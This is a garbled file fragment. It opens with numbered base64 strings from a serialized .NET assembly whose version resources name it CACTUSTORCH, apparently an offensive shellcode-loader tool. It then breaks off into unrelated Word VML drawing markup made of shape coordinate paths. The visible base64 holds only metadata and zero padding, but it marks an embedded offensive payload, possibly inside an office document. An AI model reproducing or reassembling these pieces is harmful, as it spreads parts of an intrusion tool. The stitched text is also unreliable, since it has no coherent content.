A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VABVAFMAVABP"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168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"AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUA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AAAA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AEMAQQBDAFQA"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169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"VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBp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AG8A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bgAAADEALgAw"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170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"AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkA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bwBu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AAAAMQAuADAA"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171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"LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAA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AAAAAAAAAAAA"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172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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAA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AAAAAAAAAAAA"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173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"AAAAAAAAAAAAAAAAADAAAAwAAAB0NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAA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AAAAAAAAAAAA"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174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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAA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AAAAAAAAAAAA"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175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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAA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AAAAAAAAAAAA"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176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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAA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AAAAAAAAAAAA"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177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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAA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AAAAAAAAAAAA"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178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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAA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AAAAAAAAAAAA"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454.200pt;margin-top:654.0pt;width:7.200pt;height:8.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId16" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:0.0pt;width:0.0pt;height:625.540pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,12510">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:12510" coordorigin="10402,0" coordsize="0,12510" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,5,10402,7,10402,9,10402,12,10402,16,10402,20,10402,25,10402,30,10402,36,10402,43,10402,50,10402,59,10402,68,10402,79,10402,90,10402,102,10402,116,10402,130,10402,146,10402,162,10402,181,10402,200,10402,221,10402,243,10402,266,10402,291,10402,318,10402,346,10402,376,10402,407,10402,440,10402,475,10402,511,10402,550,10402,590,10402,632,10402,676,10402,722,10402,770,10402,821,10402,873,10402,928,10402,984,10402,1043,10402,1105,10402,1169,10402,1235,10402,1303,10402,1374,10402,1448,10402,1524,10402,1603,10402,1685,10402,1769,10402,1856,10402,1946,10402,2038,10402,2134,10402,2232,10402,2334,10402,2438,10402,2546,10402,2657,10402,2771,10402,2888,10402,3008,10402,3132,10402,3259,10402,3389,10402,3523,10402,3660,10402,3801,10402,3945,10402,4093,10402,4245,10402,4400,10402,4559,10402,4722,10402,4888,10402,5059,10402,5233,10402,5412,10402,5594,10402,5781,10402,5971,10402,6166,10402,6365,10402,6568,10402,6775,10402,6987,10402,7203,10402,7424,10402,7649,10402,7878,10402,8112,10402,8351,10402,8594,10402,8842,10402,9094,10402,9352,10402,9614,10402,9881,10402,10153,10402,10430,10402,10712,10402,10999,10402,11291,10402,11588,10402,11890,10402,12198,10402,12510e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:650" coordorigin="1490,990" coordsize="8990,650" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1015,10484,1016,10484,1017,10484,1019,10484,1021,10484,1022,10484,1024,10484,1026,10484,1028,10484,1030,10484,1032,10484,1034,10484,1037,10484,1039,10484,1042,10484,1045,10484,1047,10484,1050,10484,1053,10484,1057,10484,1060,10484,1063,10484,1067,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1091,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1125,10484,1131,10484,1137,10484,1142,10484,1148,10484,1155,10484,1161,10484,1168,10484,1174,10484,1181,10484,1188,10484,1196,10484,1203,10484,1211,10484,1218,10484,1226,10484,1235,10484,1243,10484,1252,10484,1260,10484,1269,10484,1279,10484,1288,10484,1298,10484,1308,10484,1318,10484,1328,10484,1338,10484,1349,10484,1360,10484,1371,10484,1382,10484,1394,10484,1406,10484,1418,10484,1430,10484,1443,10484,1456,10484,1469,10484,1482,10484,1495,10484,1509,10484,1523,10484,1538,10484,1552,10484,1567,10484,1582,10484,1597,10484,1613,10484,1629,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10483,1645,10482,1645,10482,1645,10480,1645,10479,1645,10477,1645,10475,1645,10473,1645,10470,1645,10466,1645,10462,1645,10458,1645,10453,1645,10448,1645,10442,1645,10435,1645,10428,1645,10419,1645,10411,1645,10401,1645,10391,1645,10379,1645,10367,1645,10354,1645,10340,1645,10326,1645,10310,1645,10293,1645,10275,1645,10256,1645,10236,1645,10215,1645,10192,1645,10168,1645,10143,1645,10117,1645,10090,1645,10061,1645,10031,1645,9999,1645,9966,1645,9931,1645,9895,1645,9858,1645,9819,1645,9778,1645,9735,1645,9691,1645,9646,1645,9598,1645,9549,1645,9498,1645,9445,1645,9391,1645,9334,1645,9275,1645,9215,1645,9153,1645,9088,1645,9022,1645,8953,1645,8883,1645,8810,1645,8735,1645,8658,1645,8578,1645,8497,1645,8413,1645,8326,1645,8238,1645,8146,1645,8053,1645,7957,1645,7859,1645,7758,1645,7654,1645,7548,1645,7439,1645,7328,1645,7214,1645,7097,1645,6977,1645,6855,1645,6730,1645,6602,1645,6471,1645,6337,1645,6201,1645,6061,1645,5918,1645,5773,1645,5624,1645,5472,1645,5317,1645,5159,1645,4997,1645,4833,1645,4665,1645,4494,1645,4319,1645,4141,1645,3960,1645,3776,1645,3587,1645,3396,1645,3201,1645,3002,1645,2800,1645,2594,1645,2385,1645,2172,1645,1955,1645,1734,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1643,1510,1643,1510,1643,1510,1642,1510,1642,1510,1641,1510,1641,1510,1640,1510,1640,1510,1639,1510,1638,1510,1637,1510,1636,1510,1635,1510,1634,1510,1633,1510,1632,1510,1631,1510,1630,1510,1628,1510,1627,1510,1625,1510,1624,1510,1622,1510,1620,1510,1618,1510,1616,1510,1614,1510,1612,1510,1610,1510,1608,1510,1605,1510,1602,1510,1600,1510,1597,1510,1594,1510,1591,1510,1588,1510,1585,1510,1581,1510,1578,1510,1574,1510,1570,1510,1566,1510,1562,1510,1558,1510,1554,1510,1549,1510,1544,1510,1540,1510,1535,1510,1530,1510,1524,1510,1519,1510,1513,1510,1508,1510,1502,1510,1496,1510,1490,1510,1483,1510,1477,1510,1470,1510,1463,1510,1456,1510,1449,1510,1441,1510,1434,1510,1426,1510,1418,1510,1410,1510,1401,1510,1393,1510,1384,1510,1375,1510,1366,1510,1356,1510,1347,1510,1337,1510,1327,1510,1316,1510,1306,1510,1295,1510,1284,1510,1273,1510,1262,1510,1250,1510,1238,1510,1226,1510,1214,1510,1202,1510,1189,1510,1176,1510,1162,1510,1149,1510,1135,1510,1121,1510,1107,1510,1092,1510,1077,1510,1062,1510,1047,1510,1031,1510,1016,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:650" coordorigin="1490,990" coordsize="30,650" path="m1517,1000l1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1005,1517,1006,1517,1007,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1015,1517,1016,1517,1017,1517,1019,1517,1021,1517,1022,1517,1024,1517,1026,1517,1028,1517,1030,1517,1032,1517,1034,1517,1037,1517,1039,1517,1042,1517,1045,1517,1047,1517,1050,1517,1053,1517,1057,1517,1060,1517,1063,1517,1067,1517,1070,1517,1074,1517,1078,1517,1082,1517,1086,1517,1091,1517,1095,1517,1100,1517,1105,1517,1110,1517,1115,1517,1120,1517,1125,1517,1131,1517,1137,1517,1142,1517,1148,1517,1155,1517,1161,1517,1168,1517,1174,1517,1181,1517,1188,1517,1196,1517,1203,1517,1211,1517,1218,1517,1226,1517,1235,1517,1243,1517,1252,1517,1260,1517,1269,1517,1279,1517,1288,1517,1298,1517,1308,1517,1318,1517,1328,1517,1338,1517,1349,1517,1360,1517,1371,1517,1382,1517,1394,1517,1406,1517,1418,1517,1430,1517,1443,1517,1456,1517,1469,1517,1482,1517,1495,1517,1509,1517,1523,1517,1538,1517,1552,1517,1567,1517,1582,1517,1597,1517,1613,1517,1629,1517,1645e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:1630;width:8990;height:630" coordorigin="1490,1630" coordsize="8990,630" path="m1510,1645l1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1511,1645,1512,1645,1512,1645,1514,1645,1515,1645,1517,1645,1519,1645,1521,1645,1524,1645,1528,1645,1532,1645,1536,1645,1541,1645,1546,1645,1552,1645,1559,1645,1566,1645,1575,1645,1583,1645,1593,1645,1603,1645,1615,1645,1627,1645,1640,1645,1654,1645,1668,1645,1684,1645,1701,1645,1719,1645,1738,1645,1758,1645,1780,1645,1802,1645,1826,1645,1851,1645,1877,1645,1904,1645,1933,1645,1963,1645,1995,1645,2028,1645,2063,1645,2099,1645,2136,1645,2175,1645,2216,1645,2259,1645,2303,1645,2348,1645,2396,1645,2445,1645,2496,1645,2549,1645,2604,1645,2660,1645,2719,1645,2779,1645,2841,1645,2906,1645,2972,1645,3041,1645,3112,1645,3184,1645,3259,1645,3336,1645,3416,1645,3498,1645,3582,1645,3668,1645,3757,1645,3848,1645,3941,1645,4037,1645,4136,1645,4236,1645,4340,1645,4446,1645,4555,1645,4666,1645,4780,1645,4897,1645,5017,1645,5139,1645,5264,1645,5392,1645,5523,1645,5657,1645,5793,1645,5933,1645,6076,1645,6222,1645,6370,1645,6522,1645,6677,1645,6835,1645,6997,1645,7161,1645,7329,1645,7500,1645,7675,1645,7853,1645,8034,1645,8219,1645,8407,1645,8598,1645,8793,1645,8992,1645,9194,1645,9400,1645,9609,1645,9823,1645,10039,1645,10260,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1646,10484,1646,10484,1646,10484,1646,10484,1647,10484,1647,10484,1647,10484,1648,10484,1648,10484,1649,10484,1649,10484,1650,10484,1651,10484,1651,10484,1652,10484,1653,10484,1654,10484,1655,10484,1656,10484,1657,10484,1658,10484,1660,10484,1661,10484,1662,10484,1664,10484,1665,10484,1667,10484,1669,10484,1671,10484,1673,10484,1675,10484,1677,10484,1679,10484,1681,10484,1684,10484,1686,10484,1689,10484,1692,10484,1694,10484,1697,10484,1701,10484,1704,10484,1707,10484,1711,10484,1714,10484,1718,10484,1722,10484,1726,10484,1730,10484,1734,10484,1738,10484,1743,10484,1748,10484,1752,10484,1757,10484,1762,10484,1768,10484,1773,10484,1779,10484,1784,10484,1790,10484,1796,10484,1803,10484,1809,10484,1816,10484,1822,10484,1829,10484,1836,10484,1844,10484,1851,10484,1859,10484,1867,10484,1875,10484,1883,10484,1891,10484,1900,10484,1909,10484,1918,10484,1927,10484,1936,10484,1946,10484,1956,10484,1966,10484,1976,10484,1986,10484,1997,10484,2008,10484,2019,10484,2030,10484,2042,10484,2054,10484,2066,10484,2078,10484,2090,10484,2103,10484,2116,10484,2129,10484,2143,10484,2156,10484,2170,10484,2185,10484,2199,10484,2214,10484,2229,10484,2244,10484,2259,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10483,2275,10482,2275,10482,2275,10480,2275,10479,2275,10477,2275,10475,2275,10473,2275,10470,2275,10466,2275,10462,2275,10458,2275,10453,2275,10448,2275,10442,2275,10435,2275,10428,2275,10419,2275,10411,2275,10401,2275,10391,2275,10379,2275,10367,2275,10354,2275,10340,2275,10326,2275,10310,2275,10293,2275,10275,2275,10256,2275,10236,2275,10215,2275,10192,2275,10168,2275,10143,2275,10117,2275,10090,2275,10061,2275,10031,2275,9999,2275,9966,2275,9931,2275,9895,2275,9858,2275,9819,2275,9778,2275,9735,2275,9691,2275,9646,2275,9598,2275,9549,2275,9498,2275,9445,2275,9391,2275,9334,2275,9275,2275,9215,2275,9153,2275,9088,2275,9022,2275,8953,2275,8883,2275,8810,2275,8735,2275,8658,2275,8578,2275,8497,2275,8413,2275,8326,2275,8238,2275,8146,2275,8053,2275,7957,2275,7859,2275,7758,2275,7654,2275,7548,2275,7439,2275,7328,2275,7214,2275,7097,2275,6977,2275,6855,2275,6730,2275,6602,2275,6471,2275,6337,2275,6201,2275,6061,2275,5918,2275,5773,2275,5624,2275,5472,2275,5317,2275,5159,2275,4997,2275,4833,2275,4665,2275,4494,2275,4319,2275,4141,2275,3960,2275,3776,2275,3587,2275,3396,2275,3201,2275,3002,2275,2800,2275,2594,2275,2385,2275,2172,2275,1955,2275,1734,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2274,1510,2274,1510,2274,1510,2274,1510,2274,1510,2273,1510,2273,1510,2273,1510,2272,1510,2272,1510,2271,1510,2271,1510,2270,1510,2269,1510,2269,1510,2268,1510,2267,1510,2266,1510,2265,1510,2264,1510,2263,1510,2262,1510,2260,1510,2259,1510,2258,1510,2256,1510,2255,1510,2253,1510,2251,1510,2249,1510,2247,1510,2245,1510,2243,1510,2241,1510,2239,1510,2236,1510,2234,1510,2231,1510,2228,1510,2226,1510,2223,1510,2219,1510,2216,1510,2213,1510,2209,1510,2206,1510,2202,1510,2198,1510,2194,1510,2190,1510,2186,1510,2182,1510,2177,1510,2172,1510,2168,1510,2163,1510,2158,1510,2152,1510,2147,1510,2141,1510,2136,1510,2130,1510,2124,1510,2117,1510,2111,1510,2104,1510,2098,1510,2091,1510,2084,1510,2076,1510,2069,1510,2061,1510,2053,1510,2045,1510,2037,1510,2029,1510,2020,1510,2011,1510,2002,1510,1993,1510,1984,1510,1974,1510,1964,1510,1954,1510,1944,1510,1934,1510,1923,1510,1912,1510,1901,1510,1890,1510,1878,1510,1866,1510,1854,1510,1842,1510,1830,1510,1817,1510,1804,1510,1791,1510,1777,1510,1764,1510,1750,1510,1735,1510,1721,1510,1706,1510,1691,1510,1676,1510,1661,1510,1645e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:1630;width:30;height:650" coordorigin="1490,1630" coordsize="30,650" path="m1517,1645l1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1646,1517,1646,1517,1646,1517,1646,1517,1647,1517,1647,1517,1647,1517,1648,1517,1648,1517,1649,1517,1649,1517,1650,1517,1651,1517,1651,1517,1652,1517,1653,1517,1654,1517,1655,1517,1656,1517,1657,1517,1658,1517,1660,1517,1661,1517,1662,1517,1664,1517,1665,1517,1667,1517,1669,1517,1671,1517,1673,1517,1675,1517,1677,1517,1679,1517,1681,1517,1684,1517,1686,1517,1689,1517,1692,1517,1694,1517,1697,1517,1701,1517,1704,1517,1707,1517,1711,1517,1714,1517,1718,1517,1722,1517,1726,1517,1730,1517,1734,1517,1738,1517,1743,1517,1748,1517,1752,1517,1757,1517,1762,1517,1768,1517,1773,1517,1779,1517,1784,1517,1790,1517,1796,1517,1803,1517,1809,1517,1816,1517,1822,1517,1829,1517,1836,1517,1844,1517,1851,1517,1859,1517,1867,1517,1875,1517,1883,1517,1891,1517,1900,1517,1909,1517,1918,1517,1927,1517,1936,1517,1946,1517,1956,1517,1966,1517,1976,1517,1986,1517,1997,1517,2008,1517,2019,1517,2030,1517,2042,1517,2054,1517,2066,1517,2078,1517,2090,1517,2103,1517,2116,1517,2129,1517,2143,1517,2156,1517,2170,1517,2185,1517,2199,1517,2214,1517,2229,1517,2244,1517,2259,1517,2275e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:112.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2250" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:2250;width:8990;height:670" coordorigin="1490,2250" coordsize="8990,670" path="m1510,2275l1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1511,2275,1512,2275,1512,2275,1514,2275,1515,2275,1517,2275,1519,2275,1521,2275,1524,2275,1528,2275,1532,2275,1536,2275,1541,2275,1546,2275,1552,2275,1559,2275,1566,2275,1575,2275,1583,2275,1593,2275,1603,2275,1615,2275,1627,2275,1640,2275,1654,2275,1668,2275,1684,2275,1701,2275,1719,2275,1738,2275,1758,2275,1780,2275,1802,2275,1826,2275,1851,2275,1877,2275,1904,2275,1933,2275,1963,2275,1995,2275,2028,2275,2063,2275,2099,2275,2136,2275,2175,2275,2216,2275,2259,2275,2303,2275,2348,2275,2396,2275,2445,2275,2496,2275,2549,2275,2604,2275,2660,2275,2719,2275,2779,2275,2841,2275,2906,2275,2972,2275,3041,2275,3112,2275,3184,2275,3259,2275,3336,2275,3416,2275,3498,2275,3582,2275,3668,2275,3757,2275,3848,2275,3941,2275,4037,2275,4136,2275,4236,2275,4340,2275,4446,2275,4555,2275,4666,2275,4780,2275,4897,2275,5017,2275,5139,2275,5264,2275,5392,2275,5523,2275,5657,2275,5793,2275,5933,2275,6076,2275,6222,2275,6370,2275,6522,2275,6677,2275,6835,2275,6997,2275,7161,2275,7329,2275,7500,2275,7675,2275,7853,2275,8034,2275,8219,2275,8407,2275,8598,2275,8793,2275,8992,2275,9194,2275,9400,2275,9609,2275,9823,2275,10039,2275,10260,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2276,10484,2276,10484,2276,10484,2276,10484,2276,10484,2276,10484,2277,10484,2277,10484,2277,10484,2278,10484,2278,10484,2279,10484,2279,10484,2280,10484,2280,10484,2281,10484,2282,10484,2283,10484,2284,10484,2284,10484,2285,10484,2287,10484,2288,10484,2289,10484,2290,10484,2292,10484,2293,10484,2295,10484,2296,10484,2298,10484,2300,10484,2302,10484,2304,10484,2306,10484,2308,10484,2310,10484,2312,10484,2315,10484,2317,10484,2320,10484,2323,10484,2326,10484,2329,10484,2332,10484,2335,10484,2339,10484,2342,10484,2346,10484,2350,10484,2354,10484,2358,10484,2362,10484,2366,10484,2371,10484,2376,10484,2380,10484,2385,10484,2390,10484,2396,10484,2401,10484,2406,10484,2412,10484,2418,10484,2424,10484,2430,10484,2437,10484,2443,10484,2450,10484,2457,10484,2464,10484,2471,10484,2479,10484,2486,10484,2494,10484,2502,10484,2510,10484,2519,10484,2527,10484,2536,10484,2545,10484,2554,10484,2564,10484,2573,10484,2583,10484,2593,10484,2603,10484,2614,10484,2625,10484,2636,10484,2647,10484,2658,10484,2670,10484,2682,10484,2694,10484,2706,10484,2718,10484,2731,10484,2744,10484,2758,10484,2771,10484,2785,10484,2799,10484,2813,10484,2828,10484,2842,10484,2858,10484,2873,10484,2888,10484,2904,10484,2920,10484,2920,10484,2920,10484,2920,10484,2920,10484,2920,10484,2920,10483,2920,10482,2920,10482,2920,10480,2920,10479,2920,10477,2920,10475,2920,10473,2920,10470,2920,10466,2920,10462,2920,10458,2920,10453,2920,10448,2920,10442,2920,10435,2920,10428,2920,10419,2920,10411,2920,10401,2920,10391,2920,10379,2920,10367,2920,10354,2920,10340,2920,10326,2920,10310,2920,10293,2920,10275,2920,10256,2920,10236,2920,10215,2920,10192,2920,10168,2920,10143,2920,10117,2920,10090,2920,10061,2920,10031,2920,9999,2920,9966,2920,9931,2920,9895,2920,9858,2920,9819,2920,9778,2920,9735,2920,9691,2920,9646,2920,9598,2920,9549,2920,9498,2920,9445,2920,9391,2920,9334,2920,9275,2920,9215,2920,9153,2920,9088,2920,9022,2920,8953,2920,8883,2920,8810,2920,8735,2920,8658,2920,8578,2920,8497,2920,8413,2920,8326,2920,8238,2920,8146,2920,8053,2920,7957,2920,7859,2920,7758,2920,7654,2920,7548,2920,7439,2920,7328,2920,7214,2920,7097,2920,6977,2920,6855,2920,6730,2920,6602,2920,6471,2920,6337,2920,6201,2920,6061,2920,5918,2920,5773,2920,5624,2920,5472,2920,5317,2920,5159,2920,4997,2920,4833,2920,4665,2920,4494,2920,4319,2920,4141,2920,3960,2920,3776,2920,3587,2920,3396,2920,3201,2920,3002,2920,2800,2920,2594,2920,2385,2920,2172,2920,1955,2920,1734,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2919,1510,2919,1510,2919,1510,2919,1510,2918,1510,2918,1510,2917,1510,2917,1510,2916,1510,2916,1510,2915,1510,2914,1510,2914,1510,2913,1510,2912,1510,2911,1510,2910,1510,2909,1510,2908,1510,2907,1510,2905,1510,2904,1510,2903,1510,2901,1510,2899,1510,2898,1510,2896,1510,2894,1510,2892,1510,2890,1510,2888,1510,2886,1510,2883,1510,2881,1510,2878,1510,2875,1510,2873,1510,2870,1510,2867,1510,2863,1510,2860,1510,2857,1510,2853,1510,2850,1510,2846,1510,2842,1510,2838,1510,2834,1510,2829,1510,2825,1510,2820,1510,2815,1510,2810,1510,2805,1510,2800,1510,2795,1510,2789,1510,2783,1510,2778,1510,2771,1510,2765,1510,2759,1510,2752,1510,2746,1510,2739,1510,2732,1510,2724,1510,2717,1510,2709,1510,2702,1510,2693,1510,2685,1510,2677,1510,2668,1510,2660,1510,2651,1510,2641,1510,2632,1510,2622,1510,2612,1510,2602,1510,2592,1510,2582,1510,2571,1510,2560,1510,2549,1510,2538,1510,2526,1510,2514,1510,2502,1510,2490,1510,2477,1510,2464,1510,2451,1510,2438,1510,2425,1510,2411,1510,2397,1510,2382,1510,2368,1510,2353,1510,2338,1510,2323,1510,2307,1510,2291,1510,2275e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:113.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2270" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:2270;width:30;height:650" coordorigin="1490,2270" coordsize="30,650" path="m1517,2275l1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2276,1517,2276,1517,2276,1517,2276,1517,2276,1517,2276,1517,2277,1517,2277,1517,2277,1517,2278,1517,2278,1517,2279,1517,2279,1517,2280,1517,2280,1517,2281,1517,2282,1517,2283,1517,2284,1517,2284,1517,2285,1517,2287,1517,2288,1517,2289,1517,2290,1517,2292,1517,2293,1517,2295,1517,2296,1517,2298,1517,2300,1517,2302,1517,2304,1517,2306,1517,2308,1517,2310,1517,2312,1517,2315,1517,2317,1517,2320,1517,2323,1517,2326,1517,2329,1517,2332,1517,2335,1517,2339,1517,2342,1517,2346,1517,2350,1517,2354,1517,2358,1517,2362,1517,2366,1517,2371,1517,2376,1517,2380,1517,2385,1517,2390,1517,2396,1517,2401,1517,2406,1517,2412,1517,2418,1517,2424,1517,2430,1517,2437,1517,2443,1517,2450,1517,2457,1517,2464,1517,2471,1517,2479,1517,2486,1517,2494,1517,2502,1517,2510,1517,2519,1517,2527,1517,2536,1517,2545,1517,2554,1517,2564,1517,2573,1517,2583,1517,2593,1517,2603,1517,2614,1517,2625,1517,2636,1517,2647,1517,2658,1517,2670,1517,2682,1517,2694,1517,2706,1517,2718,1517,2731,1517,2744,1517,2758,1517,2771,1517,2785,1517,2799,1517,2813,1517,2828,1517,2842,1517,2858,1517,2873,1517,2888,1517,2904,1517,2920e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:145.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2910" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:2910;width:8990;height:630" coordorigin="1490,2910" coordsize="8990,630" path="m1510,2920l1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1511,2920,1512,2920,1512,2920,1514,2920,1515,2920,1517,2920,1519,2920,1521,2920,1524,2920,1528,2920,1532,2920,1536,2920,1541,2920,1546,2920,1552,2920,1559,2920,1566,2920,1575,2920,1583,2920,1593,2920,1603,2920,1615,2920,1627,2920,1640,2920,1654,2920,1668,2920,1684,2920,1701,2920,1719,2920,1738,2920,1758,2920,1780,2920,1802,2920,1826,2920,1851,2920,1877,2920,1904,2920,1933,2920,1963,2920,1995,2920,2028,2920,2063,2920,2099,2920,2136,2920,2175,2920,2216,2920,2259,2920,2303,2920,2348,2920,2396,2920,2445,2920,2496,2920,2549,2920,2604,2920,2660,2920,2719,2920,2779,2920,2841,2920,2906,2920,2972,2920,3041,2920,3112,2920,3184,2920,3259,2920,3336,2920,3416,2920,3498,2920,3582,2920,3668,2920,3757,2920,3848,2920,3941,2920,4037,2920,4136,2920,4236,2920,4340,2920,4446,2920,4555,2920,4666,2920,4780,2920,4897,2920,5017,2920,5139,2920,5264,2920,5392,2920,5523,2920,5657,2920,5793,2920,5933,2920